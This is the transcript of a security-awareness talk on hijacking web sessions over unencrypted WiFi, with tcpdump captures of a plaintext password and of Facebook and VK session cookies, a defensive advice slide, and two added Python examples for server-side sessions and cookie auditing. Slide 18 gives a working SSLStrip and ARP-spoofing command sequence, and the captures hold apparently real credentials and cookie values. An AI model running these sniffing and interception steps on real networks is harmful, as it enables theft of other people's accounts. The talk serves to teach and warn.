Session hijacking for dummies
  1. session hijacking for dummies (Friedemann Wulff-Woesten, WDCM Dresden)
  2. What is this all about?
     • especially in the Czech Republic: unencrypted WiFi everywhere
     • Facebook is for many people THE platform to communicate
     • many mobile devices have Facebook apps: even more data = more possibilities to attack
     • problem: almost no one types https://, so the browser always connects to port 80
  3. What is this all about?
     • this is a serious security threat
     • tools are freely available, no one cares
     • Facebook ignores the problem
     • Google went full SSL
  4. HTTP is stateless
     • request, response
     • send username/password once
     • receive cookie
     • use cookie for all future requests
  5. Cookies need to be kept secret
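Slides 4 and 5 in code, as an added example that is not part of the talk: a minimal server-side session store showing that after login the cookie is the only credential the browser ever presents, so whoever holds it is the user until the server forgets it; it also illustrates the logout caveat on slide 16. The store, the TTL and the plaintext demo credential check are constructed for the example.

```python
import secrets
import time

SESSION_TTL = 15 * 60  # seconds; constructed value for the example


class SessionStore:
    """Server side of the flow on slide 4: password once, cookie afterwards.

    The browser only ever presents the token, so a captured token *is* the user
    until the server forgets it. Revocation therefore has to happen here, not by
    deleting the cookie in the victim's browser.
    """

    def __init__(self, clock=time.time):
        self._sessions = {}  # token -> (username, issued_at)
        self._clock = clock  # injectable so expiry can be tested

    def login(self, username, password, credentials):
        """Verify the password once and hand out an unguessable token."""
        # Constructed demo check: a real service compares against a password hash.
        if credentials.get(username) != password:
            return None
        token = secrets.token_urlsafe(32)  # 256 random bits: cannot be guessed
        self._sessions[token] = (username, self._clock())
        return token

    def user_for(self, token):
        """Resolve a presented cookie value; None means 'not logged in'."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        username, issued_at = entry
        if self._clock() - issued_at > SESSION_TTL:
            del self._sessions[token]  # expired: forget it server-side
            return None
        return username

    def logout(self, token):
        """Real logout: the server forgets the token, so a replayed copy is useless."""
        self._sessions.pop(token, None)
```

Only the `logout` path makes a sniffed cookie worthless; clearing the cookie in the browser alone leaves the server-side entry valid until it expires.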
  6. (image-only slide)
  7. (image-only slide)
  8. even better: WiFi
     • cookies shouted through the air
     • someone just has to start listening
  9. let's listen...

     ```
     imac:~ eisenrah$ sudo tcpdump -A -v -i en1 tcp port 80
     tcpdump: listening on en1, link-type EN10MB (Ethernet), capture size 65535 bytes
     [...]
     17:01:36.119066 IP (tos 0x0, ttl 64, id 45430, offset 0, flags [DF], proto TCP (6), length 102)
         imac.52070 > w9e.rzone.de.http: Flags [P.], cksum 0x3e95 (correct), seq 854:904, ack 1, win 33120, options [nop,nop,TS val 709324897 ecr 1167316720], length 50
     E..f.v@.@.3.....Q....f.P.V.6)!y....`>......*GpaE...username=wdcmdd&password=meinsogeheimespasswort
     [...]
     ```
  10. Example: Request

      ```
      POST /login.php?login_attempt=1 HTTP/1.1
      Host: login.facebook.com

      email=e2@eisenrah.com&pass=ichmagdietu
      ```
  11. Example: Response

      ```
      HTTP/1.1 302 Found
      Location: http://www.facebook.com/home.php?
      Set-Cookie: xs=a1cac26e11645bca984ea98f98a6a19c; path=/; domain=.facebook.com; httponly
      ```
  12. Problem: AJAX
      • background (AJAX) requests transmit the session cookie without the user clicking anywhere
  13. tcpdump: В Контакте

      ```
      17:18:32.656064 IP (tos 0x0, ttl 64, id 7684, offset 0, flags [DF], proto TCP (6), length 674)
          imac.52256 > srv64-131.vkontakte.ru.http: Flags [P.], cksum 0x84a6 (correct), seq 930:1552, ack 743, win 65535, options [nop,nop,TS val 710338737 ecr 2377981922], length 622
      E.....@.@..[....W..@. .P*......d...........*V......POST /im915 HTTP/1.1
      Host: q63.queue.vk.com
      Connection: keep-alive
      Referer: http://q63.queue.vk.com/q_frame.php?3
      Content-Length: 307
      Origin: http://q63.queue.vk.com
      X-Requested-With: XMLHttpRequest
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1
      Content-Type: application/x-www-form-urlencoded
      Accept: */*
      Accept-Encoding: gzip,deflate,sdch
      Accept-Language: en-US,en;q=0.8
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
      Cookie: remixchk=5; remixlang=0; remixsid=2a72ff88d120569ae115f1e01885c5f14674dab175a1fb5392441d4e9840
      ```
  14. tcpdump: Facebook

      ```
      21:39:06.513002 IP (tos 0x0, ttl 64, id 35287, offset 0, flags [DF], proto TCP (6), length 1306)
          imac.50781 > channel2-02-01-snc4.facebook.com.http: Flags [P.], cksum 0xca09 (correct), seq 1:1255, ack 263, win 32830, options [nop,nop,TS val 689948758 ecr 2100724491], length 1254
      E.....@.@.e@....B..$.].P..!p.......>. .....)..V}6..GET /x/4057007781/1328384618/true/p_100001070666929=23 HTTP/1.1
      Host: 0.44.channel.facebook.com
      Connection: keep-alive
      Referer: http://0.44.channel.facebook.com/iframe/11?r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyX%2Fr%2Fimb8Z50C5TH.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyF%2Fr%2Fx3LLBUl8mEP.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyH%2Fr%2FwtfO3BqjZSC.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyz%2Fr%2FhFfiXiUF_l3.js&r=http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2FyE%2Fr%2FSp2IUK7A8Z2.js
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
      Accept: */*
      Accept-Encoding: gzip,deflate,sdch
      Accept-Language: en-US,en;q=0.8
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
      Cookie: c_user=100001070666929; datr=-J0UTvLh4Us6mmd4HoAFaYWl; L=2; lu=Rg43lZE4nMjM3vtnDl9S-BPw; sct=1312918035; xs=60%3A8a0d1e5b0344cca655fd1566026f513c; p=44; act=1312918349733%2F16; presence=EM312918690L44REp_5f1B01070666929F23X312918690038Y1312918638OQ0EsF0CEblFDacF19G312918689PEuoFD1B01609907228FDexpF1312918709806EflF_5b1_5dEolF0CE1B00195332181FDexpF13129187B69EflF_5b_5dEolF-1CCEalFD1B01609907228FDiF0EmF0CCCC; wd=840x952
      ```
  15. facebook.js changes
  16. What can you do?
      • always full SSL: type https:// in the address bar
      • click "Log out" (doesn't guarantee the session is invalidated)
      • use at least WPA2
      • use a VPN, e.g. https://webvpn.zih.tu-dresden.de/
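An added audit example, not from the talk, that ties slide 11 to slide 16: it checks a Set-Cookie header for the Secure and HttpOnly attributes and lists the session cookies a request carries over an unencrypted port, which is what a reviewer would run over a site's own traffic before relying on users to type https://. The cookie-name list and the sample request are constructed; the Set-Cookie value is the one shown on slide 11.

```python
import re

# Cookie names the slides show carrying the session (xs, c_user, remixsid) plus
# common framework defaults; extend for your own application (constructed list).
SESSION_COOKIE_NAMES = {"xs", "c_user", "remixsid", "phpsessid", "jsessionid", "sessionid"}


def parse_set_cookie(header_value):
    """Split a Set-Cookie value into (name, value, attributes); attribute names lowercased."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header_value):
    """Return (cookie name, protective attributes the server left out).
    Without Secure the browser also attaches the cookie to plain-HTTP requests."""
    name, _, attrs = parse_set_cookie(header_value)
    missing = [flag for flag in ("secure", "httponly") if flag not in attrs]
    return name, missing


def audit_plaintext_request(raw_request, dst_port):
    """List session cookies carried by a request seen on an unencrypted port."""
    if dst_port == 443:  # TLS: a passive sniffer sees only ciphertext
        return []
    match = re.search(r"^Cookie:\s*(.+)$", raw_request, re.MULTILINE | re.IGNORECASE)
    if not match:
        return []
    exposed = []
    for pair in match.group(1).split(";"):
        cookie_name = pair.strip().partition("=")[0].lower()
        if cookie_name in SESSION_COOKIE_NAMES:
            exposed.append(cookie_name)
    return exposed


# The Set-Cookie from slide 11: HttpOnly is set, Secure is not.
SLIDE_11_SET_COOKIE = "xs=a1cac26e11645bca984ea98f98a6a19c;path=/; domain=.facebook.com; httponly"

# Constructed request modelled on slide 14; the cookie values are placeholders.
CONSTRUCTED_REQUEST = ("GET /x/poll HTTP/1.1\r\nHost: 0.44.channel.facebook.com\r\n"
                       "Cookie: c_user=100000000000000; datr=PLACEHOLDER; xs=PLACEHOLDER\r\n\r\n")

if __name__ == "__main__":
    print(audit_set_cookie(SLIDE_11_SET_COOKIE))             # ('xs', ['secure'])
    print(audit_plaintext_request(CONSTRUCTED_REQUEST, 80))  # ['c_user', 'xs']
```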
  17. Even worse
      • Facebook Like buttons and Tweet buttons (included in many blogs; their cookies are sent over HTTP)
      • dirty: active attack with SSLStrip (redirects every HTTPS request to HTTP)
  18. Example: SSLStrip

      ```
      sudo -s
      echo "1" > /proc/sys/net/ipv4/ip_forward
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
      sslstrip -l 1000
      ip route show | grep default | awk '{ print $3 }'
      arpspoof <gatewayIP>
      ettercap -Tzq
      ```
  19. friedemann@wulff-woesten.de, http://wiki.eisenrah.com/wiki/Sessions
  20. @cdine, @codebutler, @eisenrah, @moxie__
  21. Sources
      • elmo and cookie monster: http://1450knsi.com/assets/images/Elmo%20Cookie%20Monster.jpg
      • wireshark collage: http://www.flickr.com/photos/43707902@N04/4022449442/ , http://www.flickr.com/photos/43707902@N04/4022445684/ , http://carlosadlrs.files.wordpress.com/2011/07/wireshark-logo.png
      • wireshark screenshot: http://dump.taylor-hughes.com/wireshark-tadalist.png
      • firesheep facebook.js screenshot: http://1.bp.blogspot.com/_BQgAZ7cjkHQ/TTbVkUVb4DI/AAAAAAAABcg/NWl1KI5PCWA/s1600/Screenshot-9.png